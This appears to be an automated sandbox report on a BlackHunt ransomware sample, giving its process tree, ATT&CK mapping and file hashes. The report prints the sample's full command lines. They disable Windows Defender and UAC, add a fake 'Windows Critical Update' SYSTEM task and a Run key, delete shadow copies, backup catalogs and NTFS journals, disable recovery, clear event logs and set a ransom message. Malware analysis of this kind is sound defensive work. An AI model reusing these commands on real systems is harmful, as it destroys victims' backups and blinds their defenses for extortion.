b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 51 PID 1652 wrote to memory of 2356 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 51 PID 2872 wrote to memory of 2912 2872 cmd.exe 54 PID 2872 wrote to memory of 2912 2872 cmd.exe 54 PID 2872 wrote to memory of 2912 2872 cmd.exe 54 PID 2720 wrote to memory of 2028 2720 cmd.exe 55 PID 2720 wrote to memory of 2028 2720 cmd.exe 55 PID 2720 wrote to memory of 2028 2720 cmd.exe 55 PID 1652 wrote to memory of 2892 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 56 PID 1652 wrote to memory of 2892 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 56 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe"C:\Users\Admin\AppData\Local\Temp\b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1652 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2356
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:3012
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2892
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1924
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2648
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2160
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1440
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2816
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3008
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1760
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1292
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1308
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1264
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2848
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2944
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2940
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe" /F2⤵PID:2964
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe" /F3⤵
- Creates scheduled task(s)
PID:1472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2072
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3056
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1744
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3048
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:604
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:988
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1052
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:936
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:844
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:568
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:4444
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4324
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:4800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4148
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:4820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:4764
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:4868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:4508
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:4776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:4936
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:4968
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:4944
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:5100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:4628
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe"2⤵
- Deletes itself
PID:3916 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:4716
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:4704
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4456
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4300
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4580
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:4252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:4212
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:4192
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:4136
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:4472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:4392
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2632
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2040
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1796
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:2484
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵
- Enumerates connected drives
PID:4120
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:4828
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:5012
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:4804
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4744
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:4884
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:4896
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:5040
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:4916
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4732
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4548
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
684B
MD5a8294e8dc98e710e9019bb648445904e
SHA1784723769e029a7b859886ec33f50b121212a928
SHA2568f1d5048c36ac21a6b86636ccf757290d72533ff2fbebd07391c1742fe4e83d0
SHA51226c06def3b3ca375e457d1f77ada019642a379baad13c20a7ccce7c3e62cba01c05291fbd80e7bde991d65fdcc4b65f202a984a573674fb647624371f1b73692
-
Filesize
1KB
MD5d6430a4462e843f43aef686fcbd80ac5
SHA17bf056a9bcbad23ed02ad664a19d8196778c54c6
SHA2569046a727552340ef31f2543735cf8fe37d805e703a47e162c506a1888ec2a1fb
SHA51282731a38495579766bc3a7282909f54a786aed64bb530b310f86d91af974c92af7b4a91633a66814ff5794412a9d0b4f85f90e905c260c5395ad0b2add2c341e
-
Filesize
12KB
MD51aa7b476cbbcd5777fcb98a8c63fe6ba
SHA1304d921dae6215dae1696ad63e834901f56aa23c
SHA256385860f16eab7420455b5e88437d8a916ae63fd3e70809bb579e0f2fe3d6952e
SHA512b76022d9ec856a82ab8e6d69a61f3db2c388912928a40a83197563e87074b2391ea36200b387bf48123d6cad5b13484eb1abde551dbda5c1999bea08d6a401da